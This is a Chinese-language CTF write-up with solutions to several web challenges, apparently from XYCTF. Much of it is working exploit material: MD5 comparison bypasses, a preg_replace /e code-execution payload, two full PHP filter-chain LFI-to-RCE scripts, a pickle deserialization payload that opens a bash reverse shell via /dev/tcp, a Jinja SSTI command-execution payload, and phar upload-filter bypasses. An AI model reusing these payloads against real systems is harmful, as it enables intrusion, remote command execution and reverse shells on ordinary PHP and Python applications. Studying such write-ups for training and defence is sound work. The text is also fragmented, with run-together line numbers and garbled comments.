warm up 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 <?php include 'next.php' ;highlight_file (__FILE__ );$XYCTF = "Warm up" ;extract ($_GET );if (isset ($_GET ['val1' ]) && isset ($_GET ['val2' ]) && $_GET ['val1' ] != $_GET ['val2' ] && md5 ($_GET ['val1' ]) == md5 ($_GET ['val2' ])) { echo "ez" . "<br>" ; } else { die ("什么情况,这么基础的md5做不来" ); } if (isset ($md5 ) && $md5 == md5 ($md5 )) { echo "ezez" . "<br>" ; } else { die ("什么情况,这么基础的md5做不来" ); } if ($XY == $XYCTF ) { if ($XY != "XYCTF_550102591" && md5 ($XY ) == md5 ("XYCTF_550102591" )) { echo $level2 ; } else { die ("什么情况,这么基础的md5做不来" ); } } else { die ("学这么久,传参不会传?" ); }
md5 弱比较直接数组或者 0e 绕过
md5 自相等也直接用现成 payload : 0e215962017
extract() 把变量覆盖掉
不难发现XYCTF_550102591其实是一个出题人特制的字符串
md5(‘XYCTF_550102591’) = ‘0E937920457786991080577371025051’
exp
1 index.php?val1[]=1&val2[]=2&md5=0e215962017&XYCTF=s878926199a&XY=s878926199a
/LLeeevvveeelll222.php
1 2 3 4 5 6 7 8 <?php highlight_file (__FILE__ );if (isset ($_POST ['a' ]) && !preg_match ('/[0-9]/' , $_POST ['a' ]) && intval ($_POST ['a' ])) { echo "操作你O.o" ; echo preg_replace ($_GET ['a' ],$_GET ['b' ],$_GET ['c' ]); } else { die ("有点汗流浃背" ); }
intval参数如果是有内容的数组返回1,可以用这个特性操作它
a[]=1
preg_replace 的 /e 修饰符使其将中间的 replacement 部分当作代码执行
1 2 GET:?a=/a/e&b=system('cat /flag')&c="a" POST a[]=1
将 a 全部替换为 cat /flag 后的内容,不就是 flag 吗
ezLFI filter 链条 下载附件源码:
1 <?php include_once ($_REQUEST ['file' ]);
诶呀这不filter链嘛
贴别人的脚本秒了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 import requestsurl = "http://localhost:51650/index.php" file_to_use = "/etc/passwd" command = "/readflag" base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4" conversions = { 'R' : 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2' , 'B' : 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2' , 'C' : 'convert.iconv.UTF8.CSISO2022KR' , '8' : 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2' , '9' : 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB' , 'f' : 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213' , 's' : 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61' , 'z' : 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937' , 'U' : 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932' , 'P' : 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB' , 'V' : 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5' , '0' : 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2' , 'Y' : 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2' , 'W' : 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936' , 'd' : 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2' , 'D' : 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2' , '7' : 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2' , '4' : 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2' } filters = "convert.iconv.UTF8.CSISO2022KR|" filters += "convert.base64-encode|" filters += "convert.iconv.UTF8.UTF7|" for c in base64_payload[::-1 ]: filters += conversions[c] + "|" filters += "convert.base64-decode|" filters += "convert.base64-encode|" filters += "convert.iconv.UTF8.UTF7|" filters += "convert.base64-decode" final_payload = f"php://filter/{filters} /resource={file_to_use} " print (final_payload)r = requests.get(url, params={ "0" : command, "file" : final_payload }) print (r.text)
login 目录扫描
–》
Starting: 1 2 [10:12:36] 200 - 547B - /login.php [10:13:36] 200 - 556B - /register.php
先注册,再登录
登录后点击 redirect ,抓包
==》
RememberMe=gASVLAAAAAAAAACMA2FwcJSMBUxvZ2lulJOUKYGUfZQojARuYW1llIwBYZSMA3B3ZJRoBnViLg==
解码后是类似 pickle 的形式
1 BM¹¾I$I$I°*`2Ý°_ô%^Vܸ»Ê¸?ÝNM^ó UVÈ%óÝ°9CöÝX~R½
考虑 pickle 反序列化
经过测试一下,发现过滤了字符 r,也就是不能用 R 指令,那我们用其他指令即可
1 2 3 4 5 6 7 import base64op='''V__setstate__ (S"bash -c 'bash -i >& /dev/tcp/X.X.X.X/port 0>&1'" ios system .''' print (base64.b64encode(op.encode()))
把网页主页的 cookie 改为这个脚本生成的 payload,再拿服务器反弹 shell 即可
give me flag 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 <?php include ('flag.php' );$FLAG_md5 = md5 ($FLAG );if (!isset ($_GET ['md5' ]) || !isset ($_GET ['value' ])){ highlight_file (__FILE__ ); die ($FLAG_md5 ); } $value = $_GET ['value' ];$md5 = $_GET ['md5' ];$time = time ();if (md5 ($FLAG .$value .$time )===$md5 ){ echo "yes, give you flag: " ; echo $FLAG ; } cc730a4fdf0b9c30e6adbd899d4a1a0f
做不出
我是一个复读机 ssti 扫描得到 /console
1 2 Console Locked The console is locked and needs to be unlocked by entering the PIN. You can find the PIN printed out on the standard output of your shell that runs the server.
但似乎没什么用
admin 账号密码爆破 –》 admin:
密码是asdqwe
进去之后有个IO界面
只不过禁止了双括号和括号百分号
但是根据题目提示,只让输英文,我们输入中文字符,发现中文字符后,有双括号出现,并且是两个中文字符才有
因此我们猜测不是英文的字符会被replace之类的,试图SSTI
我们不妨输入
二1+1三
后边我的两边夹的就是一(yi)了,因为好看)
过滤了
“ , ‘ [ ] flag _ os
构造
1 ?sentence=星(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()星&a=__globals__&b=os&c=cat%20 /flag
在c处有shell
fenjing 一把梭 ezLFI 1 <?php include_once ($_REQUEST ['file' ]);
php://filter 可读
php://input
filter_chains exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 # -*- coding: utf-8 -*- import requests #����file url = "http://gz.imxbt.cn:20501/" file_to_use = "/etc/passwd" command = "/readflag" #��������Ļ�Ӧ������ls��Ŀ¼������readflag�ļ�����flag��ֱ��ͨ��cat��ȡ������/readflag #<?=`$_GET[0]`;;?> base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4" conversions = { 'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2', 'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2', 'C': 'convert.iconv.UTF8.CSISO2022KR', '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2', '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB', 'f': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213', 's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61', 'z': 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937', 'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932', 'P': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB', 'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5', '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2', 'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2', 'W': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936', 'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2', 'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2', '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2', '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2' } # generate some garbage base64 filters = "convert.iconv.UTF8.CSISO2022KR|" filters += "convert.base64-encode|" # make sure to get rid of any equal signs in both the string we just generated and the rest of the file filters += "convert.iconv.UTF8.UTF7|" for c in base64_payload[::-1]: filters += conversions[c] + "|" # decode and reencode to get rid of everything that isn't valid base64 filters += "convert.base64-decode|" filters += "convert.base64-encode|" # get rid of equal signs filters += "convert.iconv.UTF8.UTF7|" filters += "convert.base64-decode" final_payload = f"php://filter/{filters}/resource={file_to_use}" print(final_payload) r = requests.get(url, params={ "0": command, #"action": "include", "file": final_payload }) print(r.text)
ezRce 1 2 3 4 5 6 <?php ?> "); $phar ->setMetadata($a ); $phar ->addFromString("", " test"); $phar ->stopBuffering();?>
上传遇到 hacker
后端会检查我们上传的文件里是否含有__halt_compiler();
这里会检测文件的后缀,抓包将压缩包名称改为改为 png 即可
1 2 3 Content-Disposition: form-data; name="file"; filename="phar.jpg" Content-Type: image/png
上传成功后,在 class.php 处进行 file_get_contents($_POST[‘file’]);读取 ,利用 phar为协议
现在需要绕过以 phar 开头
法一:
1 compress.bzip://phar:///test.phar
1 compress.bzip://phar:///tmp/ed54ee58cd01e120e27939fe4a64fa92.png
法二:嵌套伪协议
1 file=php://filter/convert.base64-encode/resource=phar:///tmp/23f1a0f70f076b42b5b49f24ee28f696.png
参考 https://www.yuque.com/infernity/wps/rfpnkn0293l7cp09#ezMake
https://www.cnblogs.com/LAMENTXU/articles/18147817
题解全 https://blog.csdn.net/uuzeray/article/details/138274291
